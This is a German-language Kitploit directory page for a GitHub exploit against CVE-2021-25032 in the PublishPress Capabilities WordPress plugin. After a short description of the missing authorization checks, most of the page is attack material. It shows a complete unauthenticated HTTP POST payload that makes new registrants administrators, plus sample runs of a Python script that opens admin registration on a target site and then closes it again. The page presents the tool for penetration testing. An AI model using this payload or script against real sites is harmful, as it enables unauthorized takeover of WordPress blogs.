Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-25032 — PublishPress Capabilities < 2.3.1 - Nicht authentifizierte beliebige Aktualisierung von Optionen zur Kompromittierung des Blogs | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2021-25032
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungFehlkonfiguration
GitHubrandomrobbiebf/cve-2021-25032

CVE-2021-25032

PublishPress Capabilities < 2.3.1 - Nicht authentifizierte beliebige Aktualisierung von Optionen zur Kompromittierung des Blogs

Repository anzeigen
1vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-25032

PublishPress Capabilities 2.2 - 2.3 - Nicht authentifiziertes beliebiges Options-Update zur Blog-Kompromittierung

Beschreibung

Das Plugin verfügt über keine Autorisierungs- und CSRF-Prüfungen beim Aktualisieren der Plugin-Einstellungen über den init-Hook und stellt nicht sicher, dass die zu aktualisierenden Optionen zum Plugin gehören. Infolgedessen könnten nicht authentifizierte Angreifer beliebige Blog-Optionen aktualisieren, wie z. B. die Standardrolle, und jedem neu registrierten Benutzer eine Administratorrolle zuweisen.

Proof of Concept

root@kitploit:~
POST /wp-admin/admin.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 81
Connection: close

page=pp-capabilities-settings&all_options=default_role&default_role=administrator

Beispiel zur Verwendung des Skripts

Registrierung & Admin aktivieren

root@kitploit:~
$ python3 CVE-2021-25032.py -u http://wordpress.lan
Die Plugin-Version ist unter 2.3.1.
Die Plugin-Version ist 2.2
Sicherheitsüberprüfung: http://wordpress.lan
Sie können jetzt einen Benutzer als Administrator registrieren. Denken Sie daran, nach der Registrierung --fix yes auszuführen, um zu verhindern, dass andere die Website ausnutzen.

Registrierung & Abonnent deaktivieren

root@kitploit:~
$ python3 CVE-2021-25032.py -u http://wordpress.lan --fix yes
Sicherheitsüberprüfung: http://wordpress.lan
Optionen erfolgreich gesetzt: http://wordpress.lan/wp-admin/admin.php
Behoben: Sie können sich nicht mehr registrieren
Tool herunterladen